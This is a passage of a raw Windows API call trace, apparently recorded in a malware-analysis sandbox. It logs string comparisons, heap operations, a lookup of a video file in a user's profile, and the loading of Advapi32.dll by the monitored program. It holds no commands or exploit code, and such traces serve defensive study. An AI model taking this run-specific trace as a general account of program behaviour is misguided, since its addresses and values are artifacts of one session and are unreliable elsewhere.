cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0257.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0257.860] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0257.860] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.860] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.860] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0257.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.860] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0257.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/afvn6kbS8JsNZy6W_IRM.mp4", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe301f10, ftCreationTime.dwHighDateTime=0x1d4cbb9, ftLastAccessTime.dwLowDateTime=0xc659db20, ftLastAccessTime.dwHighDateTime=0x1d4d047, ftLastWriteTime.dwLowDateTime=0xc659db20, ftLastWriteTime.dwHighDateTime=0x1d4d047, nFileSizeHigh=0x0, nFileSizeLow=0xc87b, dwReserved0=0x50530, dwReserved1=0x1060a, cFileName="afvn6kbS8JsNZy6W_IRM.mp4", cAlternateFileName="AFVN6K~1.MP4")) returned 0xaa5920 [0257.861] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.862] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.864] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.864] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.864] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0257.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.865] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.865] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.865] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.865] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0257.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.866] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.866] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.866] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.867] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.868] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0257.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.870] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.870] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.870] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.871] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0257.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 